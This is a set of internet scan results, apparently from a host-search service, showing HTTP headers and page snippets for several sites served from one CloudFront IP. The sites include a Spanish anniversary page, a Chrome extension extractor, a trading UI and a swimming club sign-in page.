X-Cache: Hit from cloudfront
Via: 1.1 89f400f550feb1d74a18ecb2070103ac.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: 1p8oa58NTHtuu9EVPyd1denTfCY--uZ4MV-zbw43vwr7x5B41c-IuQ==
Age: 1203170
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:443 · n.fplr.co
2026-01-03 01:03
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 241
Connection: close
Date: Sat, 13 Dec 2025 01:24:11 GMT
Cache-Control: public, max-age=31560000
Last-Modified: Mon, 06 Mar 2023 06:10:03 GMT
Etag: "8117852eb62459b0b3698e8f25b810fb"
Server: AmazonS3
Via: 1.1 a54cda8ccda3480314f451558e4dd062.cloudfront.net (CloudFront)
Age: 1813135
X-Cache: Hit from cloudfront
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: Em7za0NyeGQ68LPudOISDa76iDtH4O4I1NwC_jWVbdd2UgRp1RoMfA==
<!DOCTYPE html>
<html>
<head></head>
<body>
<style>
[v-cloak] {
display: none;
}
</style>
<div id="app" v-cloak></div>
<div id="debug" v-cloak></div>
<script src="./popup.js"></script>
</body>
</html>
Open service 13.32.99.35:443 · raphael-e-debora.com.br
2026-01-02 22:42
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Date: Fri, 02 Jan 2026 22:42:51 GMT Vary: X-Forwarded-Proto,Accept-Encoding Access-Control-Allow-Origin: * Server: Apache/2.4.38 (Debian) X-Cache: Miss from cloudfront Via: 1.1 efb4ddf9650598b987ef5db782c5b530.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: quGUvSc28-ehj4SGSQObDeSelSzWHNkwXdpJbjg1VupLPV9QL6GdEw==
Open service 13.32.99.35:80 · raphael-e-debora.com.br
2026-01-02 22:42
HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Fri, 02 Jan 2026 22:42:50 GMT Content-Type: text/html Content-Length: 167 Connection: close Location: https://raphael-e-debora.com.br/ X-Cache: Redirect from cloudfront Via: 1.1 968007545c497b68cc41825f11e930ba.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: pOUSlifaejKKMBgHkHBz3sFZeD6gs35j9Skzb27LnDP4uP669qAayA== Page title: 301 Moved Permanently <html> <head><title>301 Moved Permanently</title></head> <body> <center><h1>301 Moved Permanently</h1></center> <hr><center>CloudFront</center> </body> </html>
Open service 13.32.99.35:443 · www.smmallsonline.com
2026-01-02 21:58
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Fri, 02 Jan 2026 21:58:17 GMT Link: <https://www.smmallsonline.com/wp-json/>; rel="https://api.w.org/", <https://www.smmallsonline.com/wp-json/wp/v2/pages/1190>; rel="alternate"; title="JSON"; type="application/json", <https://www.smmallsonline.com/>; rel=shortlink X-Powered-By: CloudFront Server: CloudFront X-Cache: Miss from cloudfront Via: 1.1 dc0aad619823d3400ef947433d0af8fa.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: 0WLnwCcfgNymVU2m-ZFDS0EdvZqxTM0JeHhy0CA4_MjXpCZdF2xsyA== X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Referrer-Policy: no-referrer Content-Security-Policy: object-src 'none'; frame-ancestors 'self' https://play.smmetaverse.world X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Cache-Control: no-cache, no-store Expires: -1 Pragma: no-cache
Open service 13.32.99.35:443 · crxextractor.com
2026-01-02 21:58
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 12924
Connection: close
Last-Modified: Mon, 04 Dec 2023 21:45:52 GMT
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Server: AmazonS3
Date: Fri, 02 Jan 2026 03:38:49 GMT
ETag: "79adf69782c1a8cac16fa085fbb938c4"
X-Cache: Hit from cloudfront
Via: 1.1 ca8cb14c76df16342491237cea8cfed6.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: 3juom5sntc8jkKlKSP_fD4Aq9Gl-h1GTvkLHp_W-5eyIWxOhBHe7UA==
Age: 65964
Page title: Get .CRX Chrome Extension file, it's source code and download .CRX to your computer.
<!DOCTYPE html><html lang="en"><head><script>!function(e,t,a,n,r){e[n]=e[n]||[],e[n].push({"gtm.start":(new Date).getTime(),event:"gtm.js"});var g=t.getElementsByTagName(a)[0],m=t.createElement(a),s="dataLayer"!=n?"&l="+n:"";m.async=!0,m.src="https://www.googletagmanager.com/gtm.js?id="+r+s,g.parentNode.insertBefore(m,g)}(window,document,"script","dataLayer","GTM-FVTW7P4")</script><title>Get .CRX Chrome Extension file, it's source code and download .CRX to your computer.</title><meta name="keywords" content="crx, chrome, extension, get, extract, download, source, code" /><meta name="description" content="Get Chrome Extension as .crx file and extract it's source code in one click, right in your browser." /><meta charset="utf-8" /><meta name="viewport" content="width=device-width" /><meta name="author" content="Vladimir Ignatev" /><link rel="icon" type="image/png" href="images/favicon.png" /><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9423687387443767" crossorigin="anonymous"></script><body><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-FVTW7P4" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><div class="breakthrough center nomargin"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9423687387443767" crossorigin="anonymous"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9423687387443767" data-ad-slot="2749869570" data-ad-format="auto" data-full-width-responsive="true"></ins><script>(adsbygoogle=window.adsbygoogle||[]).push({})</script></div><div class="tool-wrapper"><div class="logo"><img src="images/logo.png" height="50" alt="crx extractor logo"></div><div class="welcome"><div class="row"><div class="twelve columns"><div class="container"><div class="twelve columns"><div class="header-wrapper"><h1>Get .crx Chrome Extension file and extract source code in one click</h1></div><div class="cta-wrapper"><button class="button-primary cta-button" id="cta-letsstart" tabindex="1">Let's start</button></div></div></div></div><div class="twelve columns adsense-top-side hide-small"><div class="adsense-wrapper hide-small" style="margin-top:-17rem"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9423687387443767" crossorigin="anonymous"></script><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-9423687387443767" data-ad-slot="2749869570" data-ad-format="auto" data-full-width-responsive="true"></ins><script>(adsbygoogle=window.adsbygoogle||[]).push({})</script></div></div></div></div><div class="tool container" style="display:none"><div class="row"><div class="five columns"><h3 class="center">Get source code</h3><div id="drop-zone"><div class="thanks" style="display:none"><p>You're awesome! Thank you! ❤</p></div><div class="ui-wrapper"><p>Drop .crx file here or click <br>the button to choose the file</p><input type="file" name="file" id="file" tabindex="5"></div><div class="download-btn-wrapper"><a href="#" style="display:none" tabindex="6" class="download button button-primary">Download source</a></div></div><div class="download-source-err" style="display:none"><p></p></div></div><div class="seven columns"><div class="container"><div class="row"><div class="twelve columns"><h3 class="center">Download .CRX file from the <a href="https://chromewebstore.google.com/" target="_blank" rel="nofollow">Chrome WebStore</a></h3></div></div><div class="row"><div class="twelve columns"><input tabindex="2" id="crx-download-input" class="u-full-width" placeholder="Paste the URL of Chrome Extension here"><button class="download-crx-ok button-primary" tabindex="3">OK</button><a href="#" style="display:none" class="download-crx button button-primary" tabindex="4">Get .CRX</a><p id="crx-suggestion"><i class="typcn typcn-arrow-sync"></i><span class="name">extension</span><span class="link">link</span></p></div></div><div class="row"><div class="twelve columns"><div class
Open service 13.32.99.35:443 · www.jazyemilio.com
2026-01-02 21:28
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 6803
Connection: close
Date: Sat, 20 Dec 2025 23:13:52 GMT
ETag: "471po41rxw58x"
x-nextjs-cache: HIT
x-nextjs-prerender: 1
x-nextjs-stale-time: 4294967294
x-powered-by: Next.js
Cache-Control: s-maxage=31536000,
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 6bf2ca4ea5a5c92a1d7cd2f9767e8674.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: NEySZ4lLPhShY3n6ngoE1AbdHUtDa3NiElZcr6M0A2kNlztAJNHZGg==
Age: 1116861
Page title: 1 Year Anniversary
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="preload" href="/_next/static/media/569ce4b8f30dc480-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="preload" href="/_next/static/media/93f479601ee12b01-s.p.woff2" as="font" crossorigin="" type="font/woff2"/><link rel="stylesheet" href="/_next/static/css/74a7be6fb641b609.css" data-precedence="next"/><link rel="preload" as="script" fetchPriority="low" href="/_next/static/chunks/webpack-aad2b71e0a59891b.js"/><script src="/_next/static/chunks/4bd1b696-dea39ae1858ce198.js" async=""></script><script src="/_next/static/chunks/517-2409c0bad003528d.js" async=""></script><script src="/_next/static/chunks/main-app-950337a2260c22e4.js" async=""></script><script src="/_next/static/chunks/app/page-42bc17d5975cf7d3.js" async=""></script><meta name="next-size-adjust" content=""/><title>1 Year Anniversary</title><meta name="description" content="Generated by Emilio"/><link rel="icon" href="/favicon.ico" type="image/x-icon" sizes="16x16"/><script src="/_next/static/chunks/polyfills-42372ed130431b0a.js" noModule=""></script></head><body class="__variable_4d318d __variable_ea5f4b antialiased"><main><div class="min-h-screen bg-gray-900 p-8 font-mono"><div class="max-w-5xl mx-auto"><div class="bg-black rounded-lg shadow-lg overflow-hidden border border-green-500/30"><div class="bg-black px-4 py-2 flex items-center border-b border-green-500/30"><div class="flex space-x-2"><div class="w-3 h-3 bg-red-500 rounded-full"></div><div class="w-3 h-3 bg-yellow-500 rounded-full"></div><div class="w-3 h-3 bg-green-500 rounded-full"></div></div><div class="ml-4 text-green-500 text-sm">Enero 20, 2025</div></div><div class="p-6"><div class="grid grid-cols-1 gap-8"><div class="transition-opacity duration-100 animate-[pulse_1s_ease-in-out_infinite] items-center flex flex-col"><div class="font-mono text-green-500 whitespace-pre">
********* *********
*********** *********
***********************
***********************
***********************
*********************
*******************
*****************
***************
*************
***********
*********
*******
*****
***
*
</div></div><div class="font-mono text-green-500 text-center">Hola novia :)</div><div class="font-mono text-green-500 text-center">Te quiero mucho</div><div class="font-mono text-green-500 text-center">Gracias por este año</div><div class="flex justify-center"><input type="password" placeholder="Contraseña ..." class="bg-transparent border border-green-500/30 rounded px-4 py-2 text-green-500 placeholder-green-500/50 focus:outline-none focus:border-green-500 w-64" value=""/></div></div></div></div></div></div></main><script src="/_next/static/chunks/webpack-aad2b71e0a59891b.js" async=""></script><script>(self.__next_f=self.__next_f||[]).push([0])</script><script>self.__next_f.push([1,"1:\"$Sreact.fragment\"\n2:I[5244,[],\"\"]\n3:I[3866,[],\"\"]\n4:I[3704,[\"974\",\"static/chunks/app/page-42bc17d5975cf7d3.js\"],\"default\"]\n5:I[6213,[],\"OutletBoundary\"]\n7:I[6213,[],\"MetadataBoundary\"]\n9:I[6213,[],\"ViewportBoundary\"]\nb:I[4835,[],\"\"]\n:HL[\"/_next/static/media/569ce4b8f30dc480-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/media/93f479601ee12b01-s.p.woff2\",\"font\",{\"crossOrigin\":\"\",\"type\":\"font/woff2\"}]\n:HL[\"/_next/static/css/74a7be6fb641b609.css\",\"style\"]\n"])</script><script>self.__next_f.push([1,"0:{\"P\":null,\"b\":\"Ck7sHhi1BFgmLyH_gA1y2\",\"p\":\"\",\"c\":[\"\",\"\"],\"i\":false,\"f\":[[[\"\",{\"children\":[\"__PAGE__\",{}]},\"$undefined\",\"$undefined\",true],[\"\",[\"$\",\"$1\",\"c\",{\"children\":[[[\"$\",\"link\",\"0\",{\"rel\":\"stylesheet\",\"href\":\"/_next/static/css/74a7be6fb641b609.css\",\"precedence\":\"next\",\"crossOrigin\":\"$undefined\",\"nonce\":\"$undefined\"}]],[\"$\",\"html\",null,{\"lang\":\"en\",\"children\":[\"$\",\"body\",null,{\"className\":\"__variable_4d318d __variable_
Open service 13.32.99.35:443 · exchange-ui-master.rnd.exberry-rnd.io
2026-01-02 17:48
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1382
Connection: close
Last-Modified: Tue, 30 Dec 2025 11:42:59 GMT
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Server: AmazonS3
Date: Fri, 02 Jan 2026 17:48:53 GMT
Cache-Control: max-age=0
ETag: "4fba5e0b9e829547b2bc1a013e9411aa"
X-Cache: Hit from cloudfront
Via: 1.1 a54cda8ccda3480314f451558e4dd062.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
Alt-Svc: h3=":443"; ma=86400
X-Amz-Cf-Id: HWg6l5QwTs1eAaK7eeGpyv2KV60OiKjhzwZSQEM1wJL_bKLGUeIutQ==
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: frame-ancestors 'none'
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
Vary: Origin
Page title: Exberry Master Exchange
<!doctype html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="description" content="Web application for traders" />
<meta name="title" content="Exberry Master Exchange" />
<title>Exberry Master Exchange</title>
<link rel="mask-icon" href="/static/favicon.png" color="#FFFFFF" />
<link rel="shortcut icon" id="favicon" href="/static/favicon.png" type="image/png" />
<link rel="apple-touch-icon" href="/static/apple-touch-icon.png" sizes="180x180" />
<link rel="alternate icon" href="/static/favicon.png" type="image/png" sizes="32x32" />
<link rel="manifest" href="/manifest.webmanifest">
<meta name="theme-color" content="#ffffff" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
<!-- MUI font -->
<link
href="https://fonts.googleapis.com/css2?family=Noto%20Sans:ital,wght@0,300;0,400;0,500;0,700;1,300;1,400;1,500;1,700&display=swap"
rel="stylesheet"
/>
<!-- Default loaded css only spinner -->
<script type="module" crossorigin src="/assets/index-CUfJT_DM-1767094915498.js"></script>
<link rel="stylesheet" crossorigin href="/assets/index-NTh3zHMw-1767094915498.css">
<script id="vite-plugin-pwa:register-sw" src="/registerSW.js"></script></head>
<body>
<div id="root">
<div id="loading"></div>
</div>
</body>
</html>
Open service 13.32.99.35:443 · smmallsonline.com
2026-01-02 17:36
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Date: Fri, 02 Jan 2026 17:36:30 GMT Location: https://www.smmallsonline.com/ Server: CloudFront X-Powered-By: CloudFront X-Redirect-By: WordPress X-Cache: Miss from cloudfront Via: 1.1 68b2682a924ac399aa2724b5b439e75c.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: Okwfoe09p-hI-YPO95cYh4SPDMMf8TKK2bhitYYo1EMl7FLGSnFghQ== X-XSS-Protection: 1; mode=block X-Frame-Options: DENY Referrer-Policy: no-referrer Content-Security-Policy: object-src 'none'; frame-ancestors 'self' https://play.smmetaverse.world X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Cache-Control: no-cache, no-store Expires: -1 Pragma: no-cache
Open service 13.32.99.35:443 · sf.richter-rw.de
2026-01-02 16:31
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Fri, 02 Jan 2026 16:31:55 GMT Server: Apache Link: <https://www.richter-rw.de/wp-json/>; rel="https://api.w.org/", <https://www.richter-rw.de/wp-json/wp/v2/pages/930>; rel="alternate"; title="JSON"; type="application/json", <https://www.richter-rw.de/>; rel=shortlink, <https://sf.richter-rw.de/wp-content/cache/minify/818c0.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/85615.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/3ceb8.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/1f540.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/c0b5c.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/49194.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/e6deb.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/18003.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/6178e.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/078d1.js>; rel=preload; as=script, <https://sf.richter-rw.de/wp-content/cache/minify/a8453.css>; rel=preload; as=style, <https://sf.richter-rw.de/wp-content/cache/minify/d8d42.css>; rel=preload; as=style, <https://sf.richter-rw.de/wp-content/cache/minify/59cac.css>; rel=preload; as=style Expires: Fri, 02 Jan 2026 16:50:15 GMT Pragma: public Cache-Control: max-age=1099, public Cache-Control: max-age=0, no-cache, s-maxage=10 X-Powered-By: W3 Total Cache/2.8.14 Referrer-Policy: X-Mod-Pagespeed: 1.14.36.1-0 Access-Control-Allow-Origin: * Vary: Accept-Encoding X-Cache: Miss from cloudfront Via: 1.1 5b6e22c950501920595c86fc25834582.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: 0PQjpPLUTNuAi2mZ8lriC0t7ByJESu5vMSInv3cVEYZ9fJk11JzGnA==
Open service 13.32.99.35:443 · www.legalaidconnections.org
2026-01-02 16:31
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 829
Connection: close
Date: Fri, 02 Jan 2026 16:31:50 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: x-wtc-header,Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 fa8c9f29fb8ef5c537a2a53f4de05240.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: grHDKOEiy_5f5x5LgDeH2vdr8lIzZnjnolqKnb0TJI2g95g6Ymb7pw==
Page title: Atlanta Legal Aid Society, Inc.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<html>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-82274979-1', 'auto');
ga('send', 'pageview');
</script>
<head>
<title>Atlanta Legal Aid Society, Inc. </title>
</head>
<frameset rows="100%,*" border="0">
<frame src="https://events.atlantalegalaid.org/index.php/cocktails-connections-working-draft/" frameborder="0" />
<frame frameborder="0" noresize />
</frameset>
<!-- pageok -->
<!-- 05 -->
<!-- -->
</html>
Open service 13.32.99.35:443 · triathlon-lumina.com
2026-01-02 12:06
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Fri, 02 Jan 2026 12:06:08 GMT Link: <https://triathlon-lumina.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Set-Cookie: AWSALB=N3dl3M0xhcwuiT+FwdDir3cbQx5tsiXQDtTSPgOf0Sm2u5JWWuJa46zcfdzD7WsBM11uhzWr/SzjVRDemhgwrcMHJTRWSIzW44bruGORwAi97ABaMxVUBzkJH4Ch; Expires=Fri, 09 Jan 2026 12:06:08 GMT; Path=/ Set-Cookie: AWSALBCORS=N3dl3M0xhcwuiT+FwdDir3cbQx5tsiXQDtTSPgOf0Sm2u5JWWuJa46zcfdzD7WsBM11uhzWr/SzjVRDemhgwrcMHJTRWSIzW44bruGORwAi97ABaMxVUBzkJH4Ch; Expires=Fri, 09 Jan 2026 12:06:08 GMT; Path=/; SameSite=None Set-Cookie: uk5f046a4df0598=6676581adf760431bc9f31b3ec42828a; path=/; secure; HttpOnly; SameSite=None Server: Apache/2.4.38 (Debian) X-Powered-By: PHP/7.3.19 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Cache: Miss from cloudfront Via: 1.1 968007545c497b68cc41825f11e930ba.cloudfront.net (CloudFront) X-Amz-Cf-Pop: FRA60-P3 X-Amz-Cf-Id: EjXI6LsEzW5gTTLi840SPCrHSB8vftoOki2LFylfCNneLGTDIqiRyQ==
Open service 13.32.99.35:443 · riverswimmers.club
2026-01-02 09:18
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 15069
Connection: close
Last-Modified: Sun, 04 Feb 2018 02:39:05 GMT
x-amz-server-side-encryption: AES256
Accept-Ranges: bytes
Server: AmazonS3
Date: Fri, 02 Jan 2026 09:18:55 GMT
ETag: "ce4f599ce4e1bbe8977e7e17965f7c9a"
X-Cache: Hit from cloudfront
Via: 1.1 6ae82cc0c8a39c993134c2be90b4d120.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: 8trS4OfWrAkoUCwKPO70hFPrdmzPfEk0Lfza4EudXQAbNzpM6-YTiA==
Age: 16364
Page title: River Swimmers Club
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>River Swimmers Club</title>
<meta property="og:title" content="River Swimmers Club" />
<meta property="og:type" content="website" />
<meta property="og:url" content="http://riverswimmers.club/" />
<meta property="og:image" content="http://riverswimmers.club/_img/rsc.jpg" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/css/bootstrap.min.css" integrity="sha384-/Y6pD6FV/Vv2HJnA6t+vslU6fwYXjCFtcEpHbNJ0lyAFsXTsjBbfaDjzALeQsN6M"
crossorigin="anonymous">
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.11.0/umd/popper.min.js" integrity="sha384-b/U6ypiBEHpOf/4+1nzFpr53nxSS+GLCkfwBdFNTxtclqqenISfwAzpKaMNFNmj4"
crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/js/bootstrap.min.js" integrity="sha384-h0AbiXch4ZDo7tp9hKZ4TsHbi047NrKGLO3SEJAg45jXxnGIfYzk4Si90RDIqNm1"
crossorigin="anonymous"></script>
<link href="https://vjs.zencdn.net/6.2.7/video-js.css" rel="stylesheet">
<!-- If you'd like to support IE8 -->
<script src="https://vjs.zencdn.net/ie8/1.1.2/videojs-ie8.min.js"></script>
<link rel="stylesheet" href="/_css/styles.css">
<script src="plyr/plyr.js" crossorigin="anonymous"></script>
<link rel="stylesheet" href="plyr/plyr.css">
<script>
(function (i, s, o, g, r, a, m) {
i['GoogleAnalyticsObject'] = r;
i[r] = i[r] || function () {
(i[r].q = i[r].q || []).push(arguments)
}, i[r].l = 1 * new Date();
a = s.createElement(o),
m = s.getElementsByTagName(o)[0];
a.async = 1;
a.src = g;
m.parentNode.insertBefore(a, m)
})(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-44024954-4', 'auto');
ga('send', 'pageview');
</script>
<script src="https://www.gstatic.com/firebasejs/4.4.0/firebase.js"></script>
<script>
// Initialize Firebase
var config = {
apiKey: "AIzaSyCYxdDdn-0DkSLV4fgeds1ELzznRFyDHfI",
authDomain: "riverswimmers-club.firebaseapp.com",
databaseURL: "https://riverswimmers-club.firebaseio.com",
projectId: "riverswimmers-club",
storageBucket: "riverswimmers-club.appspot.com",
messagingSenderId: "55477810250"
};
firebase.initializeApp(config);
</script>
<script type="text/javascript">
/**
* Handles the sign in button press.
*/
function toggleSignIn() {
if (firebase.auth().currentUser) {
// [START signout]
firebase.auth().signOut();
// [END signout]
} else {
var email = document.getElementById('email').value;
var password = document.getElementById('password').value;
if (email.length < 4) {
alert('Please enter an email address.');
return;
}
if (password.length < 4) {
alert('Please enter a password.');
return;
}
// Sign in with email and pass.
// [START authwithemail]
firebase.auth().signInWithEmailAndPassword(email, password).catch(function (error) {
// Handle Errors here.
var errorCode = error.code;
var errorMessage = error.message;
// [START_EXCLUDE]
if (errorCode === 'auth/wrong-password') {
alert('Wrong
Open service 13.32.99.35:443 · mastersuite.com
2026-01-02 05:10
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 2976
Connection: close
Last-Modified: Wed, 21 Oct 2020 03:10:47 GMT
Accept-Ranges: bytes
Server: AmazonS3
Date: Fri, 02 Jan 2026 05:10:41 GMT
ETag: "166b685d213cebc0f3a7336fd56d85d8"
X-Cache: Hit from cloudfront
Via: 1.1 7395d1816622756cd6753f5e1281200c.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: FRA60-P3
X-Amz-Cf-Id: -_iLjCihJpgq-OB5nXQRWBZaOqhBo5_UzLgOAtMlAZLU_DQcvncf-g==
Age: 7476
Page title: MasterSuite
